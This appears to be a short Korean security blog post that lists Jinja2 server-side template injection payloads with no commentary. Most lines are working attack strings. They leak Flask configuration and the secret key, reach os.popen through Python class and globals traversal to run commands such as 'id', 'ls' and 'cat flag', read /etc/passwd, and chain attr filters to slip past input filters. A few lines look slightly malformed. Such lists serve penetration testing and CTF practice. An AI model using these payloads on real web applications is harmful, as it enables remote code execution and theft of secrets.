SSTI payload(Jinja2 템플릿)

2025. 6. 6. 21:18보안 컨설팅/기술적 취약점 점검

{{ 7+7 }}
{{ config }}
{{ config.items() }}
{{ config['secret_key'] }}
{{"".__class__.__mro__[1].__subclasses__()[index]('cat flag', shell=True, stdout=-1).communicate()}}
{{"".__class__.__mro__[1].__subclasses__()[index]('cat flag', shell=True, stdout=-1).communicate()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{ (config|attr('__class__')).__init__.__globals__['os'].popen('cat flag').read() }}
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('id')|attr('read')()}}
{{ self._TemplateReference__context.cyder.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{ get_flashed_messages.__globals__['__builtins__'].__open('/etc/passwd').read() }}
{{get_flashed_messages.__globals__['__builtins__'].__eval__('__import__("os").popen("whoami").read()')}}
{{ url_for.__globals__.__builtins__.__eval__('__import__("os").popen("ls").read()') }}